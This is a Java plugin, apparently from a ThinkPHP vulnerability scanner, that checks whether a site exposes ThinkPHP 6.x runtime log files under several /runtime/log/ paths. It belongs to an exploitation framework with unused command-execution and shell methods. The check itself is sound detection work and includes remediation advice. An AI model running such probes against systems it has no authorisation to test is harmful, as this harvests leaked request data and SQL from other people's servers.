package exploit;
import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Result;
import java.util.ArrayList;
import java.util.Date;
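/**
 * Detection check for an exposed ThinkPHP 6.x runtime log file.
 *
 * <p>The check requests today's log file ({@code yyyyMM/dd.log}) under a small set of
 * {@code /runtime/log/} directories and reports a finding when the response looks like a
 * framework log. A positive result means the web server is serving the application's
 * runtime directory; such logs commonly hold request data, SQL statements and error details.
 * The usual remediation is to keep {@code runtime/} outside the document root or to deny
 * access to it in the web server configuration.
 *
 * <p>Limitations: the file name is built from the scanner's local date, so a target in another
 * time zone (or a scan around midnight) can yield a false negative. The markers are plain
 * substrings, so a positive result should be confirmed manually.
 *
 * <p>Author: 莲花, 2021/9/12
 */
public class tp6_log implements BasePayload {

    /** Finding title reported to the caller (runtime string, kept as in the original). */
    private static final String VUL_NAME = "ThinkPHP 6.x 日志泄露";

    /** Log directories probed, relative to the target base URL. */
    private static final String[] LOG_DIRS = {
        "/runtime/log/",
        "/runtime/log/Home/",
        "/runtime/log/Common/",
        "/runtime/log/Admin/",
    };

    /** Substrings whose presence in the response body is treated as "this is a log file". */
    private static final String[] LOG_MARKERS = {"RunTime", "[ error ]"};

    /** Connect/read timeout so one unresponsive host cannot stall the whole scan. */
    private static final int TIMEOUT_MS = 10_000;

    /**
     * Probes the candidate log locations and reports the first one that looks like a log.
     *
     * @param url base URL of the target; trailing slashes are ignored
     * @return a positive {@link Result} carrying the matching URL, or a negative result when
     *     no candidate matched, the URL was empty, or every request failed
     * @throws Exception declared by {@link BasePayload}; request failures are handled here
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        if (url == null || url.isEmpty()) {
            return new Result(false, VUL_NAME, "");
        }

        // Avoid "//runtime/..." when the caller passes a base URL ending in '/'.
        String base = url;
        while (base.endsWith("/")) {
            base = base.substring(0, base.length() - 1);
        }

        // Locale.ROOT keeps the digits ASCII; the default locale may localize them.
        String suffix = String.format(java.util.Locale.ROOT, "%1$tY%1$tm/%1$td.log", new Date());

        for (String dir : LOG_DIRS) {
            String candidate = base + dir + suffix;
            System.out.println(candidate);
            // Failures are handled per request: one unreachable candidate must not
            // silently skip the remaining ones and produce a false negative.
            try {
                HttpRequest request = HttpRequest.get(candidate)
                        .connectTimeout(TIMEOUT_MS)
                        .readTimeout(TIMEOUT_MS);
                // Only a 200 response counts; error pages that merely echo a marker
                // would otherwise be reported as a leak.
                if (!request.ok()) {
                    continue;
                }
                // NOTE(review): body() buffers the whole response and log files can be
                // large; consider a bounded read if memory use becomes a problem.
                String body = request.body();
                if (body != null && looksLikeLog(body)) {
                    return new Result(true, VUL_NAME, candidate);
                }
            } catch (Exception e) {
                // Deliberate best-effort: record the failure and try the next candidate.
                System.err.println("tp6_log: request failed for " + candidate + ": " + e);
            }
        }
        return new Result(false, VUL_NAME, "");
    }

    /** Returns true when the body contains any of the known log markers. */
    private static boolean looksLikeLog(String body) {
        for (String marker : LOG_MARKERS) {
            if (body.contains(marker)) {
                return true;
            }
        }
        return false;
    }

    /**
     * Not applicable to this check: log exposure is an information leak only.
     *
     * @return always a negative, empty {@link Result}
     */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, "", "");
    }

    /**
     * Not applicable to this check: log exposure is an information leak only.
     *
     * @return always a negative, empty {@link Result}
     */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, "", "");
    }
}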